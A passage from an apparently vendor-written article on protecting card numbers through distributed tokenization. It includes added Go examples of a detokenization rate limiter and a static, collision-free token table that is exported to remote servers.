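One concrete form of the last control, the monitoring and blocking of suspicious request volumes, as an added example rather than anything from the article or a product: a sliding-window limit per calling principal on the detokenization path. A legitimate settlement job detokenizes at a steady rate; a compromised account that suddenly pulls clear PANs in bulk trips the limit, is blocked for a cooling-off period, and raises an alert for the security operations team. The window, the limit, the block duration and the principal names are assumed values, and the clock is passed in so the same logic can be replayed over captured request logs.

```go
package main

import (
	"fmt"
	"time"
)

// Throttle is a per-principal sliding-window limit on detokenization requests:
// a caller that exceeds `limit` requests inside `window` is blocked for `block`
// and an alert is recorded. The thresholds are assumed policy values.
type Throttle struct {
	window, block time.Duration
	limit         int
	history       map[string][]time.Time // principal -> request times in window
	blockedUntil  map[string]time.Time   // principal -> when the block expires
	alerts        []string
}

func NewThrottle(window time.Duration, limit int, block time.Duration) *Throttle {
	return &Throttle{window: window, limit: limit, block: block,
		history: map[string][]time.Time{}, blockedUntil: map[string]time.Time{}}
}

// Allow records one detokenize request and reports whether it may proceed. The
// clock is a parameter so the same logic can be replayed over captured logs.
func (th *Throttle) Allow(principal string, now time.Time) bool {
	if until, ok := th.blockedUntil[principal]; ok {
		if now.Before(until) {
			return false // still in the cooling-off period: fail closed
		}
		delete(th.blockedUntil, principal)
	}
	kept := th.history[principal][:0] // drop timestamps that have left the window
	for _, ts := range th.history[principal] {
		if now.Sub(ts) < th.window {
			kept = append(kept, ts)
		}
	}
	kept = append(kept, now)
	th.history[principal] = kept
	if len(kept) > th.limit {
		th.blockedUntil[principal] = now.Add(th.block)
		th.alerts = append(th.alerts, fmt.Sprintf("%s: %s exceeded %d detokenizations in %s, blocked until %s",
			now.Format(time.RFC3339), principal, th.limit, th.window, now.Add(th.block).Format(time.RFC3339)))
		return false
	}
	return true
}

// Alerts returns the block events raised so far, oldest first.
func (th *Throttle) Alerts() []string { return th.alerts }

func main() {
	th := NewThrottle(time.Minute, 5, 10*time.Minute)
	start := time.Date(2010, 7, 1, 9, 0, 0, 0, time.UTC) // constructed clock
	for i := 0; i < 7; i++ { // a bulk pull: the sixth request trips the limit
		fmt.Println(i+1, th.Allow("batch-export", start.Add(time.Duration(i)*time.Second)))
	}
	for _, a := range th.Alerts() {
		fmt.Println(a)
	}
}
```

The check is deliberately placed on the detokenize path and not on tokenize: issuing tokens exposes nothing, while every successful detokenization hands out a clear PAN, so the volume of that operation is the signal worth watching.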

Transparency, availability, performance, scalability and security are common concerns with tokenization, particularly if the service is outsourced. Transparency can be enhanced by selecting a tokenization solution that is well integrated into enterprise systems like databases. Availability concerns can be addressed by selecting a tokenization solution that runs in-house on a high availability platform. Performance issues can be addressed by selecting a tokenization solution that runs locally on your high transaction volume servers. Scalability is best addressed by selecting a tokenization solution that runs in-house on your high performance corporate backbone network.

The solution: Distributed tokenization

Distributed tokenization is a method of storing sensitive strings of characters on a local server. This new approach changes where tokenization can be used. After years of research and development, Protegrity has developed a solution by intelligently altering the traditional backend processes used in tokenization.

This new patent-pending way to tokenize data is intended to remove the challenges associated with standard centralized tokenization and the outsourcing issues described above. Particularly in high volume operations, the usual way of generating tokens (minting a value, checking it against every token already issued and recording the mapping on a central server) is prone to issues that affect the availability and performance of the data. From a security standpoint, it is critical to address collisions, which occur when a tokenization solution assigns the same token to two separate pieces of data: once that happens, one of the two records can no longer be recovered correctly from its token.
This next generation tokenization solution addresses these issues. System performance, availability and scaling are enhanced, numeric and alphanumeric tokens are generated, key management is greatly simplified, and collisions are eliminated.

The benefits include scalability with multiple, parallel instances, high performance, high availability, centralized or distributed deployment, no token collisions, and support for PCI and PII data.

A solution can provide easy export of the static token tables to remote token servers to support a distributed tokenization operation. The static token tables can be distributed by using a simple file export to each token server. Each token table should be encrypted throughout this export and import operation.
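
The following added Go example (not Protegrity's implementation, whose internals the article does not describe) shows why a static table removes both the collision problem and the need to call a central server for each request. The table is a random permutation of all 4-digit blocks, generated once centrally; because a permutation is a bijection, two different inputs can never produce the same output, so there is nothing to check at tokenization time. Every server that holds a copy of the table tokenizes identically and independently, and the inverse table gives it detokenization without any shared state. The split of a 16-digit PAN into three chained blocks, the two-pass mixing so that every output block depends on the whole input, and the check in LoadTable that refuses a received table that is not a permutation are design choices of this example; the encryption of the exported table in transit and at rest, which the article requires, is left to the caller, and copying the struct stands in for the export and import step.

```go
package main

import (
	"crypto/rand"
	"errors"
	"fmt"
	"math/big"
	"strconv"
)

const blockMod = 10000 // every table entry maps one 4-digit block
var leftToRight, rightToLeft = []int{0, 1, 2}, []int{2, 1, 0}
// TokenTable holds a random permutation of 0..9999 and its inverse: a bijection, so no collisions.
type TokenTable struct{ fwd, inv [blockMod]uint16 }

// LoadTable is what a remote token server runs on a received table: it builds the
// inverse and refuses a non-permutation, which would silently map two PANs to one token.
func LoadTable(fwd [blockMod]uint16) (*TokenTable, error) {
	t := &TokenTable{fwd: fwd}
	seen := make([]bool, blockMod)
	for i, v := range fwd {
		if int(v) >= blockMod || seen[v] {
			return nil, errors.New("table is not a permutation")
		}
		seen[v], t.inv[v] = true, uint16(i)
	}
	return t, nil
}

func NewTokenTable() *TokenTable { // run once, centrally: Fisher-Yates over crypto/rand
	var fwd [blockMod]uint16
	for i := range fwd {
		fwd[i] = uint16(i)
	}
	for i := blockMod - 1; i > 0; i-- {
		j, _ := rand.Int(rand.Reader, big.NewInt(int64(i+1))) // a CSPRNG failure is fatal anyway
		fwd[i], fwd[j.Int64()] = fwd[j.Int64()], fwd[i]
	}
	t, _ := LoadTable(fwd) // a shuffle is always a permutation
	return t
}

func (t *TokenTable) chain(b []int, order []int) { // substitute each block mixed with the previous output
	prev := 0
	for _, i := range order {
		b[i] = int(t.fwd[(b[i]+prev)%blockMod])
		prev = b[i]
	}
}

func (t *TokenTable) unchain(b []int, order []int) { // same order backwards: each predecessor still intact
	for k := len(order) - 1; k >= 0; k-- {
		prev := 0
		if k > 0 {
			prev = b[order[k-1]]
		}
		b[order[k]] = (int(t.inv[b[order[k]]]) - prev + blockMod) % blockMod
	}
}

func splitBlocks(s string) ([]int, error) { // leading 12 digits of a 16-digit string as 3 blocks
	if _, err := strconv.ParseUint(s, 10, 64); err != nil || len(s) != 16 {
		return nil, errors.New("expected 16 digits")
	}
	b := make([]int, 3)
	for i := range b {
		b[i], _ = strconv.Atoi(s[4*i : 4*i+4])
	}
	return b, nil
}

// Tokenize runs two passes in opposite directions so every output block depends
// on every input block; the last four digits stay in the clear for receipts.
func (t *TokenTable) Tokenize(pan string) (string, error) {
	b, err := splitBlocks(pan)
	if err != nil {
		return "", err
	}
	t.chain(b, leftToRight)
	t.chain(b, rightToLeft)
	return fmt.Sprintf("%04d%04d%04d%s", b[0], b[1], b[2], pan[12:]), nil
}

func (t *TokenTable) Detokenize(tok string) (string, error) { // undo the passes in reverse order
	b, err := splitBlocks(tok)
	if err != nil {
		return "", err
	}
	t.unchain(b, rightToLeft)
	t.unchain(b, leftToRight)
	return fmt.Sprintf("%04d%04d%04d%s", b[0], b[1], b[2], tok[12:]), nil
}

func main() {
	central := NewTokenTable()
	remote := *central // stands in for an (encrypted) export to a second server
	tok, _ := remote.Tokenize("4111111111111111") // constructed test PAN
	fmt.Println(tok)
}
```

A truncated or tampered table file is the failure mode to plan for: LoadTable refuses it rather than letting that server quietly issue tokens that collide with, or cannot be reversed by, every other server. This example is meant to show the mechanism of a static table, not to be a vetted cipher; a product would wrap the table in a vetted format-preserving construction and key management.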

Conclusion 

This new way to tokenize data eliminates 
challenges associated with standard central- 
ized tokenization, and has the potential to 
change where tokenization can be used. 

It is important to understand that data is stored to support follow-up checks, audits, and analysis. At the same time the information stored on the servers is a security risk, and needs to be protected. Even though the examples discussed in this article are mostly concerned with credit card numbers, similar issues are encountered when handling social security numbers, driving license numbers or bank account numbers. Companies need to deploy an enterprise tokenization and key management solution to lock down such data across the enterprise.

A holistic solution for data security should be based on centralized data security management that protects sensitive information from acquisition to deletion across the enterprise.

Third party data security vendors develop solutions that protect data in the most cost effective manner. External security technology specialists with deep expertise in data security techniques, encryption key management, and security policy in distributed environments are needed to find the most cost effective approach for each organization. To maximize security with minimal business impact, a high performance, transparent solution optimized for the dynamic enterprise requires a risk-adjusted approach to data security. This approach determines which data security techniques are deployed on each system in the enterprise.